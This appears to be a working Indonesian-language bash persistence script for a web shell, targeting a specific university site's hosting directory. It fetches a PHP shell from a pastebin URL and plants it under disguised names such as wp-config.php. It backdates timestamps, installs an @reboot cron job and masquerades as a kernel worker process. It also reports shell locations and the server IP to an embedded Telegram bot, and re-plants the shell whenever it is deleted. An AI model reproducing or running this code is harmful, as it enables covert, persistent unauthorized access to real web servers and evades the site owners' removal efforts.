#!/bin/bash # === Konfigurasi === RAW_SHELL_URL="https://pastebin.com/raw/TNh35cA7" BOT_TOKEN="8295512712:AAFQcEhu2gRC-W8Ov-9pOcMPQy6mxxeRBOs" # GANTI BOT TOKEN CHAT_ID="1345261884" # GANTI ID TELEGRAM FAKE_NAMES=( "index.php" "wp-config.php" "wp-login.php" "wp-admin.php" "wp-settings.php" "wp-load.php" "functions.php" "xmlrpc.php" "configuration.php" "administrator.php" "config.php" "install.php" "admin.php" "autoload.php" "settings.php" "db.php" "repair.php" "upload.php" "cmd.php" "test.php" "backup.php" "shell.php" "uploadify.php" "exploit.php" "functions.bak.php" "functions.old.php" "class.php" "class-wp.php" "wp-settings.bak.php" "wp-settings.old.php" "phpinfo.php" "info.php" "debug.php" "console.php" "session.php" "cache.php" "db_backup.php" "sql_dump.php" "uploads.php" "filemanager.php" "fileupload.php" "download.php") TIMEOUT=10 POLL_INTERVAL=2 ROOT_DIR="/home/u148690810/domains/akuntansife.umc.ac.id/public_html/" # SET ROOT WEBSITE MANUAL random_old_date() { local days_ago=$((RANDOM % 336 + 30)) date -d "$days_ago days ago" +"%Y-%m-%d %H:%M:%S" } BASE_DIR="$(cd "$(dirname "$0")" && pwd)" DOMAIN="${1%/}" [ -z "$DOMAIN" ] && DOMAIN="http://$(hostname -f)/" TMP_PATH="/tmp/.sys-$(head -c4 /dev/urandom | od -An -t x1 | tr -d ' ')" cp "$0" "$TMP_PATH" 2>/dev/null chmod +x "$TMP_PATH" random_date=$(random_old_date) touch -d "$random_date" "$TMP_PATH" (crontab -l 2>/dev/null; echo "@reboot $TMP_PATH $DOMAIN >/dev/null 2>&1 &") | crontab - 2>/dev/null renice 19 $$ >/dev/null 2>&1 exec -a "[kworker/0:1]" "$TMP_PATH" "$DOMAIN" & kirim_telegram() { local message="$1" curl -s -m "$TIMEOUT" -X POST "https://api.telegram.org/bot$BOT_TOKEN/sendMessage" \ -d "chat_id=$CHAT_ID" \ --data-urlencode "parse_mode=Markdown" \ --data-urlencode "text=$message" >/dev/null } download_shell() { local target="$1" curl -s -m "$TIMEOUT" -o "$target" "$RAW_SHELL_URL" chmod 444 "$target" 2>/dev/null } get_oldest_timestamp() { local dir="$1" local oldest oldest=$(find "$dir" -type f -printf '%T@ %p\n' 2>/dev/null | sort -n | head -n1 | awk '{print $1}') if [ -z "$oldest" ]; then date +%s else date -d "@$oldest" +"%Y-%m-%d %H:%M:%S" fi } get_random_writable_dir() { find "$ROOT_DIR" -type d -writable 2>/dev/null | shuf -n1 } selamatkan_shell() { local trigger="$1" local random_name="${FAKE_NAMES[$RANDOM % ${#FAKE_NAMES[@]}]}" local random_dir random_dir=$(get_random_writable_dir) mkdir -p "$random_dir" 2>/dev/null local new_path="$random_dir/$random_name" download_shell "$new_path" random_date=$(random_old_date) touch -d "$random_date" "$new_path" 2>/dev/null local ts=$(date +"%Y-%m-%d %H:%M:%S") local ip=$(curl -s --max-time 3 https://api.ipify.org || echo "unknown") local url="$DOMAIN${new_path#$ROOT_DIR}" local message="⚠️ *Shell Dipindahkan! (Trigger: $trigger)* 📁 Path: \`$new_path\` 🌍 URL: \`$url\` 🌐 IP: \`$ip\` 🕒 Waktu: $ts" kirim_telegram "$message" SHELL_PATH="$new_path" } deploy_shell() { local random_dir random_dir=$(get_random_writable_dir) mkdir -p "$random_dir" 2>/dev/null local random_name="${FAKE_NAMES[$RANDOM % ${#FAKE_NAMES[@]}]}" SHELL_PATH="$random_dir/$random_name" download_shell "$SHELL_PATH" random_date=$(random_old_date) touch -d "$random_date" "$SHELL_PATH" 2>/dev/null local ts=$(date +"%Y-%m-%d %H:%M:%S") local url="$DOMAIN${SHELL_PATH#$ROOT_DIR}" local message="✅ *Shell berhasil dideploy!* 📁 Path: \`$SHELL_PATH\` 🌍 URL: \`$url\` 🕒 Waktu: $ts" kirim_telegram "$message" } check_file_changes() { if [ ! -f "$SHELL_PATH" ]; then selamatkan_shell "missing" fi } main_loop() { deploy_shell while true; do check_file_changes sleep "$POLL_INTERVAL" done } main_loop